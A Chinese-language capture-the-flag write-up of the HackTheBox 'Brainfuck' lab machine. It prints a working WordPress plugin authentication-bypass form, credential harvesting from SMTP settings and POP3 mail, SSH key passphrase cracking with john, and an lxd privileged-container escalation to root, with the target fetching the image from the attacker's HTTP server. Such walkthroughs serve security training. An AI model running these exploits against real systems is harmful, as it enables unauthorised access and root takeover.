Hackthebox - Brainfuck

靶场信息

靶场类型

信息收集

Nmap

┌──(root㉿kali)-[~/Desktop]
└─# nmap -sS -sV -A -sC -p- --min-rate 10000 10.10.10.17
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-19 01:49 CST
Nmap scan report for 10.10.10.17
Host is up (0.41s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 94d0b334e9a537c5acb980df2a54a5f0 (RSA)
|   256 6bd5dc153a667af419915d7385b24cb2 (ECDSA)
|_  256 23f5a333339d76d5f2ea6971e34e8e02 (ED25519)
25/tcp  open  smtp     Postfix smtpd
|_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
110/tcp open  pop3     Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN) USER TOP AUTH-RESP-CODE CAPA RESP-CODES PIPELINING UIDL
143/tcp open  imap     Dovecot imapd
|_imap-capabilities: SASL-IR ENABLE LITERAL+ LOGIN-REFERRALS more listed ID capabilities have post-login Pre-login AUTH=PLAINA0001 IMAP4rev1 OK IDLE
443/tcp open  ssl/http nginx 1.10.0 (Ubuntu)
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.10.0 (Ubuntu)
| tls-nextprotoneg: 
|_  http/1.1
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
| Not valid before: 2017-04-13T11:19:29
|_Not valid after:  2027-04-11T11:19:29
|_ssl-date: TLS randomness does not represent time
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%), Linux 4.4 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host:  brainfuck; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 110/tcp)
HOP RTT       ADDRESS
1   482.21 ms 10.10.16.1
2   482.26 ms 10.10.10.17

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.32 seconds
DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb

这边又两个域名,先加入 hosts 解析吧

echo 10.10.10.17 brainfuck.htb www.brainfuck.htb sup3rs3cr3t.brainfuck.htb >> /etc/hosts

Http

直接访问是 Nginx 默认页面

使用 hosts 解析后访问是一个 wordpress 页面,版本是 4.7.3

这里的内容是 SMTP 集成已准备就绪吗,然后给了我们一个邮件地址,让我们检查后把反馈发送到这个地址

orestis@brainfuck.htb

SMTP 使用的端口是 25 端口,这里先记录一下,说不定有用

既然知道是 wordpress 了,那就用 wpscan 去扫描一下

Wpscan

┌──(root㉿kali)-[~/Desktop]
└─# wpscan --url "https://brainfuck.htb/" --disable-tls-checks
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: https://brainfuck.htb/ [10.10.10.17]
[+] Started: Thu Jan 19 02:01:26 2023

Interesting Finding(s):

[+] wp-support-plus-responsive-ticket-system
 | Location: https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/
 | Last Updated: 2019-09-03T07:57:00.000Z
 | [!] The version is out of date, the latest version is 9.1.2
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 7.1.3 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt

发现一个老版本插件

https://www.exploit-db.com/exploits/41006

搜索这个插件找到了一个可利用的漏洞

漏洞利用

<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
    Username: <input type="text" name="username" value="admin">
    <input type="hidden" name="email" value="orestis@brainfuck.htb">
    <input type="hidden" name="action" value="loginGuestFacebook">
    <input type="submit" value="Login">
</form>

将我们的 poc 保存到本地,然后使用 python3 开启一个 http 服务

python3 -m http.server 80

选择登录试试

点击后是一片空白页面,不确定是否利用成功,返回主页看看

ok,这里我们利用成功了,已经成功登录

在 Settings -> Easy WP SMTP 中,可以看到 SMTP 的信息,这里密码是隐藏的

使用控制台就可以看到密码

SMTP
Email = orestis@brainfuck.htb
username = orestis
password = kHGuERB29DNiNE
┌──(root㉿kali)-[~/Desktop]
└─# nc 10.10.10.17 110
+OK Dovecot ready.
USER orestis
+OK
PASS kHGuERB29DNiNE
+OK Logged in.
list
+OK 2 messages:
1 977
2 514
.
retr 1
+OK 977 octets
Return-Path: <www-data@brainfuck.htb>
X-Original-To: orestis@brainfuck.htb
Delivered-To: orestis@brainfuck.htb
Received: by brainfuck (Postfix, from userid 33)
        id 7150023B32; Mon, 17 Apr 2017 20:15:40 +0300 (EEST)
To: orestis@brainfuck.htb
Subject: New WordPress Site
X-PHP-Originating-Script: 33:class-phpmailer.php
Date: Mon, 17 Apr 2017 17:15:40 +0000
From: WordPress <wordpress@brainfuck.htb>
Message-ID: <00edcd034a67f3b0b6b43bab82b0f872@brainfuck.htb>
X-Mailer: PHPMailer 5.2.22 (https://github.com/PHPMailer/PHPMailer)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8

Your new WordPress site has been successfully set up at:

https://brainfuck.htb

You can log in to the administrator account with the following information:

Username: admin
Password: The password you chose during the install.
Log in here: https://brainfuck.htb/wp-login.php

We hope you enjoy your new site. Thanks!

--The WordPress Team
https://wordpress.org/
.
retr 2
+OK 514 octets
Return-Path: <root@brainfuck.htb>
X-Original-To: orestis
Delivered-To: orestis@brainfuck.htb
Received: by brainfuck (Postfix, from userid 0)
        id 4227420AEB; Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
To: orestis@brainfuck.htb
Subject: Forum Access Details
Message-Id: <20170429101206.4227420AEB@brainfuck>
Date: Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
From: root@brainfuck.htb (root)

Hi there, your credentials for our "secret" forum are below :)

username: orestis
password: kIEnnfEKJ#9UmdO

Regards
.

得到了两封邮件

Return-Path: <www-data@brainfuck.htb>
X-Original-To: orestis@brainfuck.htb
Delivered-To: orestis@brainfuck.htb
Received: by brainfuck (Postfix, from userid 33)
        id 7150023B32; Mon, 17 Apr 2017 20:15:40 +0300 (EEST)
To: orestis@brainfuck.htb
Subject: New WordPress Site
X-PHP-Originating-Script: 33:class-phpmailer.php
Date: Mon, 17 Apr 2017 17:15:40 +0000
From: WordPress <wordpress@brainfuck.htb>
Message-ID: <00edcd034a67f3b0b6b43bab82b0f872@brainfuck.htb>
X-Mailer: PHPMailer 5.2.22 (https://github.com/PHPMailer/PHPMailer)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8

Your new WordPress site has been successfully set up at:

https://brainfuck.htb

You can log in to the administrator account with the following information:

Username: admin
Password: The password you chose during the install.
Log in here: https://brainfuck.htb/wp-login.php

We hope you enjoy your new site. Thanks!

--The WordPress Team
https://wordpress.org/
Return-Path: <root@brainfuck.htb>
X-Original-To: orestis
Delivered-To: orestis@brainfuck.htb
Received: by brainfuck (Postfix, from userid 0)
        id 4227420AEB; Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
To: orestis@brainfuck.htb
Subject: Forum Access Details
Message-Id: <20170429101206.4227420AEB@brainfuck>
Date: Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
From: root@brainfuck.htb (root)

Hi there, your credentials for our "secret" forum are below :)

username: orestis
password: kIEnnfEKJ#9UmdO

Regards

得到了一个账号密码

username: orestis
password: kIEnnfEKJ#9UmdO

sup3rs3cr3t.brainfuck.htb

我们看一下另一个地址是什么东西

似乎是一个论坛

用我们刚才的账号密码去登录试试

成功登录

这里的对话有点意思,就是有个人骂管理员,赶快把密钥发给我。管理员说,你个小碧池,我看你一点礼貌都没有,信不信我把密钥贴在这里给大家下载。然后那个人说他开了一个新的加密通话的帖子

密码解密

我们可以看到,对话已经被加密了,然后我找了一个解密的网站

https://planetcalc.com/2468/

brainfu - ckmybra inf uck myb rainfu

然后我们先删除所有的特殊字符

brainfuckmybrainfuckmybrainfu

我们去尝试解密,可以确定的是

mnvze://zsrivszwm.rfz/8cr5ai10r915218697i1w658enqc0cs8/ozrxnkc/ub_sja

这一段肯定是一个网址,所以我们看看这一段密码怎么解密才能让它变成网址

fuckmybrain

https://brainfuck.htb/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa

最后得出了密钥和地址

私钥解密

┌──(root㉿kali)-[~/Desktop]
└─# cat id_rsa    
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6904FEF19397786F75BE2D7762AE7382

mneag/YCY8AB+OLdrgtyKqnrdTHwmpWGTNW9pfhHsNz8CfGdAxgchUaHeoTj/rh/
B2nS4+9CYBK8IR3Vt5Fo7PoWBCjAAwWYlx+cK0w1DXqa3A+BLlsSI0Kws9jea6Gi
W1ma/V7WoJJ+V4JNI7ufThQyOEUO76PlYNRM9UEF8MANQmJK37Md9Ezu53wJpUqZ
7dKcg6AM/o9VhOlpiX7SINT9dRKaKevOjopRbyEFMliP01H7ZlahWPdRRmfCXSmQ
zxH9I2lGIQTtRRA3rFktLpNedNPuZQCSswUec7eVVt2mc2Zv9PM9lCTJuRSzzVum
oz3XEnhaGmP1jmMoVBWiD+2RrnL6wnz9kssV+tgCV0mD97WS+1ydWEPeCph06Mem
dLR2L1uvBGJev8i9hP3thp1owvM8HgidyfMC2vOBvXbcAA3bDKvR4jsz2obf5AF+
Fvt6pmMuix8hbipP112Us54yTv/hyC+M5g1hWUuj5y4xovgr0LLfI2pGe+Fv5lXT
mcznc1ZqDY5lrlmWzTvsW7h7rm9LKgEiHn9gGgqiOlRKn5FUl+DlfaAMHWiYUKYs
LSMVvDI6w88gZb102KD2k4NV0P6OdXICJAMEa1mSOk/LS/mLO4e0N3wEX+NtgVbq
ul9guSlobasIX5DkAcY+ER3j+/YefpyEnYs+/tfTT1oM+BR3TVSlJcOrvNmrIy59
krKVtulxAejVQzxImWOUDYC947TXu9BAsh0MLoKtpIRL3Hcbu+vi9L5nn5LkhO/V
gdMyOyATor7Amu2xb93OO55XKkB1liw2rlWg6sBpXM1WUgoMQW50Keo6O0jzeGfA
VwmM72XbaugmhKW25q/46/yL4VMKuDyHL5Hc+Ov5v3bQ908p+Urf04dpvj9SjBzn
schqozogcC1UfJcCm6cl+967GFBa3rD5YDp3x2xyIV9SQdwGvH0ZIcp0dKKkMVZt
UX8hTqv1ROR4Ck8G1zM6Wc4QqH6DUqGi3tr7nYwy7wx1JJ6WRhpyWdL+su8f96Kn
F7gwZLtVP87d8R3uAERZnxFO9MuOZU2+PEnDXdSCSMv3qX9FvPYY3OPKbsxiAy+M
wZezLNip80XmcVJwGUYsdn+iB/UPMddX12J30YUbtw/R34TQiRFUhWLTFrmOaLab
Iql5L+0JEbeZ9O56DaXFqP3gXhMx8xBKUQax2exoTreoxCI57axBQBqThEg/HTCy
IQPmHW36mxtc+IlMDExdLHWD7mnNuIdShiAR6bXYYSM3E725fzLE1MFu45VkHDiF
mxy9EVQ+v49kg4yFwUNPPbsOppKc7gJWpS1Y/i+rDKg8ZNV3TIb5TAqIqQRgZqpP
CvfPRpmLURQnvly89XX97JGJRSGJhbACqUMZnfwFpxZ8aPsVwsoXRyuub43a7GtF
9DiyCbhGuF2zYcmKjR5EOOT7HsgqQIcAOMIW55q2FJpqH1+PU8eIfFzkhUY0qoGS
EBFkZuCPyujYOTyvQZewyd+ax73HOI7ZHoy8CxDkjSbIXyALyAa7Ip3agdtOPnmi
6hD+jxvbpxFg8igdtZlh9PsfIgkNZK8RqnPymAPCyvRm8c7vZFH4SwQgD5FXTwGQ
-----END RSA PRIVATE KEY-----

然后我们得到了私钥,但是似乎是加密的,我们还不能直接使用

┌──(root㉿kali)-[~/Desktop]
└─# ssh2john id_rsa > id_rsa_decode     
                                                                                                                                                                                                                   
┌──(root㉿kali)-[~/Desktop]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_decode 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
3poulakia!       (id_rsa)     
1g 0:00:00:03 DONE (2023-01-19 15:20) 0.3095g/s 3857Kp/s 3857Kc/s 3857KC/s 3prash0..3pornuthin
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

得到了私钥的密码

3poulakia!
┌──(root㉿kali)-[~/Desktop]
└─# ssh orestis@10.10.10.17 -i id_rsa
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-75-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


You have mail.
Last login: Mon Oct  3 19:41:38 2022 from 10.10.14.23
orestis@brainfuck:~$ id&&whoami
orestis@brainfuck:~$ whoami&&id
orestis
uid=1000(orestis) gid=1000(orestis) groups=1000(orestis),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),121(lpadmin),122(sambashare)

成功得到 user 权限

orestis@brainfuck:~$ cat user.txt 
2c11cfbc5b959f73ac15a3310bd097c9

成功得到 user 权限的 flag 文件

权限提升

通过上面的 id 我们可以看到,当前用户在 lxd 权限组中

https://www.exploit-db.com/exploits/46978

通过搜索 lxd 找到了一个 exploit

Step 1

┌──(root㉿kali)-[~/Desktop]
└─# wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine
--2023-01-19 15:28:34--  https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine
正在解析主机 raw.githubusercontent.com (raw.githubusercontent.com)... 2606:50c0:8003::154, 2606:50c0:8000::154, 2606:50c0:8002::154, ...
正在连接 raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8003::154|:443... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:8060 (7.9K) [text/plain]
正在保存至: “build-alpine”

build-alpine                                         100%[=====================================================================================================================>]   7.87K  --.-KB/s  用时 0s      

2023-01-19 15:28:35 (27.1 MB/s) - 已保存 “build-alpine” [8060/8060])

首先下载 build-alpine

Step 2

接着运行

┌──(root㉿kali)-[~/Desktop]
└─# ./build-alpine 
Determining the latest release... v3.17
Using static apk from http://dl-cdn.alpinelinux.org/alpine//v3.17/main/x86_64
Downloading alpine-keys-2.4-r1.apk
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
Downloading apk-tools-static-2.12.10-r1.apk
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
alpine-devel@lists.alpinelinux.org-6165ee59.rsa.pub: 成功
Verified OK
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  2527  100  2527    0     0    740      0  0:00:03  0:00:03 --:--:--   741
--2023-01-19 15:38:57--  http://alpine.mirror.wearetriple.com/MIRRORS.txt
正在解析主机 alpine.mirror.wearetriple.com (alpine.mirror.wearetriple.com)... 2a00:1f00:dc06:10::106, 93.187.10.106
正在连接 alpine.mirror.wearetriple.com (alpine.mirror.wearetriple.com)|2a00:1f00:dc06:10::106|:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:2527 (2.5K) [text/plain]
正在保存至: “/root/Desktop/rootfs/usr/share/alpine-mirrors/MIRRORS.txt”

/root/Desktop/rootfs/usr/share/alpine-mirrors/MIRROR 100%[=====================================================================================================================>]   2.47K  --.-KB/s  用时 0s      

2023-01-19 15:39:00 (77.3 MB/s) - 已保存 “/root/Desktop/rootfs/usr/share/alpine-mirrors/MIRRORS.txt” [2527/2527])

Selecting mirror http://mirror.clarkson.edu/alpine//v3.17/main
fetch http://mirror.clarkson.edu/alpine//v3.17/main/x86_64/APKINDEX.tar.gz
(1/25) Installing alpine-baselayout-data (3.4.0-r0)
(2/25) Installing musl (1.2.3-r4)
(3/25) Installing busybox (1.35.0-r29)
Executing busybox-1.35.0-r29.post-install
(4/25) Installing busybox-binsh (1.35.0-r29)
(5/25) Installing alpine-baselayout (3.4.0-r0)
Executing alpine-baselayout-3.4.0-r0.pre-install
Executing alpine-baselayout-3.4.0-r0.post-install
(6/25) Installing ifupdown-ng (0.12.1-r1)
(7/25) Installing libcap2 (2.66-r0)
(8/25) Installing openrc (0.45.2-r7)
Executing openrc-0.45.2-r7.post-install
(9/25) Installing mdev-conf (4.3-r0)
(10/25) Installing busybox-mdev-openrc (1.35.0-r29)
(11/25) Installing alpine-conf (3.15.0-r0)
(12/25) Installing alpine-keys (2.4-r1)
(13/25) Installing alpine-release (3.17.1-r0)
(14/25) Installing ca-certificates-bundle (20220614-r4)
(15/25) Installing libcrypto3 (3.0.7-r2)
(16/25) Installing libssl3 (3.0.7-r2)
(17/25) Installing ssl_client (1.35.0-r29)
(18/25) Installing zlib (1.2.13-r0)
(19/25) Installing apk-tools (2.12.10-r1)
(20/25) Installing busybox-openrc (1.35.0-r29)
(21/25) Installing busybox-suid (1.35.0-r29)
(22/25) Installing scanelf (1.3.5-r1)
(23/25) Installing musl-utils (1.2.3-r4)
(24/25) Installing libc-utils (0.7.2-r3)
(25/25) Installing alpine-base (3.17.1-r0)
Executing busybox-1.35.0-r29.trigger
OK: 10 MiB in 25 packages
┌──(root㉿kali)-[~/Desktop]
└─# ls
 alpine-v3.17-x86_64-20230119_1539.tar.gz

多了一个压缩文件

Step 3

使用 python3 开启一个 http 服务

python3 -m http.server 80

Step 4

在靶机中使用 wget 下载,然后运行

orestis@brainfuck:~$ wget http://10.10.16.11/alpine-v3.17-x86_64-20230119_1539.tar.gz
--2023-01-19 09:41:24--  http://10.10.16.11/alpine-v3.17-x86_64-20230119_1539.tar.gz
Connecting to 10.10.16.11:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3792999 (3.6M) [application/gzip]
Saving to: ‘alpine-v3.17-x86_64-20230119_1539.tar.gz’

alpine-v3.17-x86_64-20230119_1539.tar.gz             100%[=====================================================================================================================>]   3.62M   810KB/s    in 11s     

2023-01-19 09:41:37 (328 KB/s) - ‘alpine-v3.17-x86_64-20230119_1539.tar.gz’ saved [3792999/3792999]
orestis@brainfuck:~$ lxc image import alpine-v3.17-x86_64-20230119_1539.tar.gz --alias test
Generating a client certificate. This may take a minute...
If this is your first time using LXD, you should also run: sudo lxd init
To start your first container, try: lxc launch ubuntu:16.04

Image imported with fingerprint: 2f15d7d049eb4ce507a0ec903b690f37e78c2166c9d6fd062dbfed81b3816467
orestis@brainfuck:~$ lxc image list
+-------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| ALIAS | FINGERPRINT  | PUBLIC |          DESCRIPTION          |  ARCH  |  SIZE  |         UPLOAD DATE          |
+-------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| test  | 2f15d7d049eb | no     | alpine v3.17 (20230119_15:39) | x86_64 | 3.62MB | Jan 19, 2023 at 7:43am (UTC) |
+-------+--------------+--------+-------------------------------+--------+--------+------------------------------+

已经运行成功了,咱们去继续利用

lxc init test test -c security.privileged=true # 初始化镜像
lxc config device add test test disk source=/ path=/mnt/root recursive=true # 挂载磁盘
lxc start test # 启动镜像
lxc exec test /bin/sh # 进入镜像
orestis@brainfuck:~$ lxc exec test /bin/sh
~ # whoami&&id
root
uid=0(root) gid=0(root)

成功拿到 root 权限

~ # cat /mnt/root/root/root.txt
6efc1a5dbb8904751ce6566a305bb8ef

成功拿到 root 权限的 flag 文件